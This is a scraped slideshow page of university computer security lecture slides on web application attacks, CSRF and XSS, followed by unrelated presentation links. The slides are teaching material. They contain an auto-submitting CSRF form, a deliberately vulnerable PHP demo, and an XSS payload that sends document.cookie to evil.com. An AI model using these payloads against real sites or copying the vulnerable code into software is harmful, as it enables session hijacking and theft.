web security web application security spring 2016
play

Web Security: Web Application Security Spring 2016 Franziska - PowerPoint PPT Presentation

Apr 28, 2023 •517 likes •874 views

CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John

  1. CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell, Vitaly Shmatikov, Bennet Yee, and many others for sample slides and materials ...

  2. Web Applications • Big trend: software as a Web-based service – Online banking, shopping, government, bill payment, tax prep, customer relationship management, etc. – Cloud computing • Applications hosted on Web servers – Written in a mixture of PHP, Ruby, Java, Perl, ASP • Security is rarely the main concern – Poorly written scripts with inadequate input validation – Sensitive data stored in world-readable files 5/3/16 CSE 484 / CSE M 584 - Spring 2016 2

  3. Dynamic Web Application GET / HTTP/1.1 Browser Web server HTTP/1.1 200 OK index.php Database server 5/3/16 CSE 484 / CSE M 584 - Spring 2016 3

  4. http://www.owasp.org OWASP Top 10 Web Vulnerabilities 1. Injection 2. Broken Authentication & Session Management 3. Cross-Site Scripting 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross-Site Request Forgery 9. Using Known Vulnerable Components 10. Unvalidated Redirects and Forwards 5/3/16 CSE 484 / CSE M 584 - Spring 2016 4

  5. Cross-Site Request Forgery (CSRF/XSRF) 5/3/16 CSE 484 / CSE M 584 - Spring 2016 5

  6. Cookie-Based Authentication Redux Browser Server POST/login.cgi r o t a c t i n e h t u a : e i k o o c - t e S GET… Cookie: authenticator e s n o p s e r 5/3/16 CSE 484 / CSE M 584 - Spring 2016 6

  7. Browser Sandbox Redux • Based on the same origin policy (SOP) • Active content (scripts) can send anywhere! – For example, can submit a POST request – Some ports inaccessible -- e.g., SMTP (email) • Can only read response from the same origin – … but you can do a lot with just sending! 5/3/16 CSE 484 / CSE M 584 - Spring 2016 7

  8. Cross-Site Request Forgery • Users logs into bank.com, forgets to sign off – Session cookie remains in browser state • User then visits a malicious website containing <form name=BillPayForm action=http://bank.com/BillPay.php> <input name=recipient value=badguy> … <script> document.BillPayForm.submit(); </script> • Browser sends cookie, payment request fulfilled! • Lesson: cookie authentication is not sufficient when side effects can happen 5/3/16 CSE 484 / CSE M 584 - Spring 2016 8

  9. Cookies in Forged Requests Cookie: SessionID=523FA4cd2E User credentials automatically sent by browser 5/3/16 CSE 484 / CSE M 584 - Spring 2016 9

  10. Sending a Cross-Domain POST <form <form method="POST" method="POST" action=http:// action=http://othersite.com othersite.com/action /action > ... ... </form> </form> submit post <script>document.forms <script> document.forms[0].submit()</script> [0].submit()</script> • Hidden iframe can do this in the background • User visits a malicious page, browser submits form on behalf of the user – Hijack any ongoing session (if no protection) • Netflix: change account settings, Gmail: steal contacts, Amazon: one-click purchase – Reprogram the user’s home router – Many other attacks possible 5/3/16 CSE 484 / CSE M 584 - Spring 2016 10

  11. XSRF (aka CSRF): Summary Server victim n o i s s e s h s i l b a t s e 1 send forged request 4 2 visit server 3 User victim receive malicious page Attack server Q: how long do you stay logged on to Gmail? Financial sites? 5/3/16 CSE 484 / CSE M 584 - Spring 2016 11

  12. XSRF True Story [Alex Stamos] CyberVillians.com Internet Exploder GET news.html www.cybervillians.com/news.html HTML and JS B er nank e R eally an A lien? script HTML Form POSTs StockBroker.com Hidden iframes submitted forms that… • Changed user’s email notification settings • Linked a new checking account • Transferred out $5,000 ticker.stockbroker.com • Unlinked the account Java • Restored email notifications 5/3/16 CSE 484 / CSE M 584 - Spring 2016 12

  13. Broader View of XSRF • Abuse of cross-site data export – SOP does not control data export – Malicious webpage can initiates requests from the user’s browser to an honest server – Server thinks requests are part of the established session between the browser and the server (automatically sends cookies) 5/3/16 CSE 484 / CSE M 584 - Spring 2016 13

  14. Login XSRF: Attacker logs you in as them! User logged in as attacker Attacker’s account reflects user’s behavior 5/3/16 CSE 484 / CSE M 584 - Spring 2016 14

  15. XSRF Defenses • Secret validation token <input type=hidden value=23a3af01b> • Referer validation Referer: http://www.facebook.com/home.php 5/3/16 CSE 484 / CSE M 584 - Spring 2016 15

  16. Add Secret Token to Forms <input type=hidden value=23a3af01b> • “Synchronizer Token Pattern” • Include a secret challenge token as a hidden input in forms – Token often based on user’s session ID – Server must verify correctness of token before executing sensitive operations • Why does this work? – Same-origin policy: attacker can’t read token out of legitimate forms loaded in user’s browser, so can’t create fake forms with correct token 5/3/16 CSE 484 / CSE M 584 - Spring 2016 16

  17. Referer Validation ü Referer: http://www.facebook.com/home.php û Referer: http://www.evil.com/attack.html ? Referer: • Lenient referer checking – header is optional • Strict referer checking – header is required 5/3/16 CSE 484 / CSE M 584 - Spring 2016 17

  18. Why Not Always Strict Checking? • Why might the referer header be suppressed? – Stripped by the organization’s network filter • For example, http://intranet.corp.apple.com/projects/iphone/ competitors.html – Stripped by the local machine – Stripped by the browser for HTTPS → HTTP transitions – User preference in browser – Buggy browser • Web applications can’t afford to block these users • Referer rarely suppressed over HTTPS – Logins typically use HTTPS – helps against login XSRF! 5/3/16 CSE 484 / CSE M 584 - Spring 2016 18

  19. Cross-Site Scripting (XSS) 5/3/16 CSE 484 / CSE M 584 - Spring 2016 19

  20. PHP: Hypertext Processor • Server scripting language with C-like syntax • Can intermingle static HTML and code <input value=<?php echo $myvalue; ?>> • Can embed variables in double-quote strings $user = “ world ” ; echo “ Hello $user! ” ; or $user = “ world ” ; echo “ Hello ” . $user . “ ! ” ; • Form data in global arrays $_GET, $_POST, … 5/3/16 CSE 484 / CSE M 584 - Spring 2016 20

  21. Echoing / “Reflecting” User Input Classic mistake in server-side applications http://naive.com/search.php?term= “ Justin Bieber ” search.php responds with <html> <html> <title>Search <title>Search results</title> results</title> <body>You <body>You have have searched searched for for <? <?php php echo echo $_GET[term] $_GET[term] ?> ?>… … </body> </body> Or GET/ hello.cgi?name=Bob hello.cgi responds with <html>Welcome, <html>Welcome, dear dear Bob</html> Bob</html> 5/3/16 CSE 484 / CSE M 584 - Spring 2016 21

  22. Echoing / “Reflecting” User Input naive.com/hello.cgi?name= <img src=‘ naive.com/hello.cgi? http://upload.wikimedia.org/wikipedia/en/thumb/3/39/ name= Bob � YoshiMarioParty9.png/210px-YoshiMarioParty9.png’> � Welcome, dear Bob Welcome, dear 5/3/16 CSE 484 / CSE M 584 - Spring 2016 22

  23. Cross-Site Scripting (XSS) naive.com evil.com hello.cgi Access some web page <iframe src= http://naive.com/hello.cgi? GET/ hello.cgi?name= name=<script>win.open( <script>win.open( “ http:// “ http://evil.com/steal.cgi? evil.com/steal.cgi?cookie= ” + hello.cgi cookie= ” +document.cookie) document.cookie)</script> executed </script>> <HTML>Hello, dear <script>win.open( “ http:// Forces victim’s browser to evil.com/steal.cgi?cookie= ” call hello.cgi on naive.com +document.cookie)</script> with this script as “ name ” Welcome!</HTML> GET/ steal.cgi?cookie= Interpreted as JavaScript by victim’s browser; opens window and calls steal.cgi on evil.com victim’s browser 5/3/16 CSE 484 / CSE M 584 - Spring 2016 23

  24. XSS – Quick Demo <?php Need to explicitly disable setcookie("SECRET_COOKIE", "12345"); XSS protection – newer header("X-XSS-Protection: 0"); browsers try to help web developers avoid these ?> vulnerabilities! <html><body><br><br> <form action="vulnerable.php" method="get"> Name: <input type="text" name="name" size="80"> <input type="submit" value="submit”></form> <br><br><br> <div id="greeting"> <?php $name = $_GET["name"]; if($name) { echo "Welcome " . $_GET['name'];} ?> </div></body></html> 5/3/16 CSE 484 / CSE M 584 - Spring 2016 24

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security Introducing Spring Security View layer security Whats coming in Spring Security 3 E-mail: craig@habuma.com Blog: http://www.springloaded.info

452 views • 19 slides
Web Security [Web Application Security] Spring 2020 Franziska (Franzi) Roesner

Web Security [Web Application Security] Spring 2020 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Web Security [Web Application Security] Spring 2020 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

540 views • 29 slides
Application Security as a Service: Start Your Application Security Initiative in Less than a Day

Application Security as a Service: Start Your Application Security Initiative in Less than a Day

Application Security as a Service: Start Your Application Security Initiative in Less than a Day David Harper Practice Principal Fortify on Demand #MicroFocusCyberSummit Agenda The Application Security Problem Security Gate Secure DevOps

37.39k views • 30 slides
Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web

Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web

Web Security Cyber Security Lab Spring '10 04/15/10 Cyber Security Lab 1 Outline Web application weaknesses XSS AJAX weaknesses SQL Injection Attacks (Slides from Lars Olson)

588 views • 41 slides
Application Security Management (ASM) August 9, 2016 CC Kermen Agenda About Application

Application Security Management (ASM) August 9, 2016 CC Kermen Agenda About Application

Application Security Management (ASM) August 9, 2016 CC Kermen Agenda About Application Security Management (ASM) Features and Benefits Performance Review Ordering Information About Application Security Management (ASM)

618 views • 7 slides
Web Security: Basic Web Security Model Spring 2016 Franziska (Franzi) Roesner

Web Security: Basic Web Security Model Spring 2016 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Basic Web Security Model Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John

498 views • 31 slides
Usable Security [finish] &amp; Physical Security Spring 2016 Franziska (Franzi) Roesner

Usable Security [finish] &amp; Physical Security Spring 2016 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Usable Security [finish] &amp; Physical Security Spring 2016 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John

395 views • 12 slides
CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Web (and internet) security: two views Just a long running network service Complex application with multiple layers and components.

577 views • 47 slides
Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application Transport Network Link Physical CSE 461 University of Washington 2 Security Threats Security is like performance Means many things

374 views • 13 slides
Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application Transport Network Link Physical CSE 461 University of Washington 2 Security Threats Security is like performance Means many things

932 views • 55 slides
Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security Information Systems Course Business Course site: https://67327.cmuis.net Schedule Reading Assignments in-class labs -- laptops w/ 272

1.31k views • 11 slides
Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security Information Systems Course Business Course site: http://67327.cmuis.net Schedule Reading Assignments in-class labs -- laptops w/ 272

981 views • 10 slides
Program Analysis for Web Application Security Presented by Justin Samuel For UW CSE 504, Spring

Program Analysis for Web Application Security Presented by Justin Samuel For UW CSE 504, Spring

Program Analysis for Web Application Security Presented by Justin Samuel For UW CSE 504, Spring 10 Instructor: Ben Livshits Finding Security Vulnerabilities in Java Applications with Static Analysis V. Benjamin Livshits and Monica S. Lam

743 views • 34 slides
The End of Software Security (and some Cryptography) Spring 2016 Ada (Adam) Lerner

The End of Software Security (and some Cryptography) Spring 2016 Ada (Adam) Lerner

CSE 484 / CSE M 584: Computer Security and Privacy The End of Software Security (and some Cryptography) Spring 2016 Ada (Adam) Lerner lerner@cs.washington.edu Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John

870 views • 76 slides
Software In-Security Buffer overflows Overview Web Application security Malware OS

Software In-Security Buffer overflows Overview Web Application security Malware OS

Lecture overview Table of contents: Introduction to SW security Software In-Security Buffer overflows Overview Web Application security Malware OS security topics Code scanning Emmanuel Benoist Taught by Ulrich

479 views • 13 slides
CSCI 8260 Spring 2016 Computer and Networks Security INTRODUCTION 1 Research in Computer

CSCI 8260 Spring 2016 Computer and Networks Security INTRODUCTION 1 Research in Computer

CSCI 8260 Spring 2016 Computer and Networks Security INTRODUCTION 1 Research in Computer Security Studies in what ways security mechanisms may fail Can we gain access to a computer system without authorizaDon? Can we compromise

986 views • 84 slides
I18n (Internationalization) OpenStack Summit |Denver 2019 - Project update SPEAKER: FRANK

I18n (Internationalization) OpenStack Summit |Denver 2019 - Project update SPEAKER: FRANK

May 1 2019 I18n (Internationalization) OpenStack Summit |Denver 2019 - Project update SPEAKER: FRANK KLOEKER IRC: eumel8 Agenda Introduction of I18n team mission and team structure Stein facts I18n Guide Project Doc

194 views • 18 slides
A simple Model to describe Smoke Ring shaped Beam Profile Measurements with Scintillating Screens

A simple Model to describe Smoke Ring shaped Beam Profile Measurements with Scintillating Screens

A simple Model to describe Smoke Ring shaped Beam Profile Measurements with Scintillating Screens at the European XFEL G. Kube, S. Liu, A. Novokshonov, M. Scholz DESY (Hamburg) OTR based profile measurements Optical Transition Radiation (OTR)

328 views • 15 slides
Geo-neutrino results with Borexino -- Romain Roncin on behalf of the Borexino Collaboration --

Geo-neutrino results with Borexino -- Romain Roncin on behalf of the Borexino Collaboration --

Geo-neutrino results with Borexino -- Romain Roncin on behalf of the Borexino Collaboration -- Laboratori Nazionali del Gran Sasso International Conference on Particle Physics and Astrophysics 2015 October 06, 2015 -- Why geo-neutrinos? -- --

442 views • 19 slides
Filter Banks SPEECH RECOGNITION 40833 1 2 Spectral Analysis Models (a) Pattern Recognition

Filter Banks SPEECH RECOGNITION 40833 1 2 Spectral Analysis Models (a) Pattern Recognition

Filter Banks SPEECH RECOGNITION 40833 1 2 Spectral Analysis Models (a) Pattern Recognition (b) Acoustic phonetic approaches to speech recognition 3 Spectral Analysis Models LPC analysis model 4 THE BANK-OF-FILTERS FRONT- END

505 views • 32 slides
Lars Bauer, Jrg Henkel - 1 - Lecture time: Mi., 15.45 - 17.15 Bld. 50.34, HS -102

Lars Bauer, Jrg Henkel - 1 - Lecture time: Mi., 15.45 - 17.15 Bld. 50.34, HS -102

Institut fr Technische Informatik Chair for Embedded Systems - Prof. Dr. J. Henkel Vorlesung im SS 2014 Lars Bauer, Jrg Henkel - 1 - Lecture time: Mi., 15.45 - 17.15 Bld. 50.34, HS -102 Homepage: http://ces.itec.kit.edu/teaching/

723 views • 29 slides
Harmonical structure of digital sequences and applications to s-dimensional uniform

Harmonical structure of digital sequences and applications to s-dimensional uniform

Journ ees de Num eration Graz, Mai 1620, 2007 Harmonical structure of digital sequences and applications to s-dimensional uniform distribution mod 1 Pierre LIARDET (Joint work with Guy Barat) guy.barat@tugraz.at TU Graz Univ. de

390 views • 24 slides
Combining text/image in WikipediaMM task 2009 Christophe Moulin, C ecile Barat, C edric

Combining text/image in WikipediaMM task 2009 Christophe Moulin, C ecile Barat, C edric

Combining text/image in WikipediaMM task 2009 Christophe Moulin, C ecile Barat, C edric Lema tre, Mathias G ery, Christophe Ducottet, Christine Largeron Laboratoire Hubert Curien, Saint- Etienne, France October 1st 2009

1.47k views • 16 slides
Sabana REIT (the Merger) 12 November 2020 Important Notice Important Notice The value of

Sabana REIT (the Merger) 12 November 2020 Important Notice Important Notice The value of

Proposed Merger with Sabana REIT (the Merger) 12 November 2020 Important Notice Important Notice The value of units in ESR-REIT ( ESR-REIT Units &quot;) and the income derived from them may fall as well as rise. ESR-REIT Units are not

681 views • 29 slides

More recommend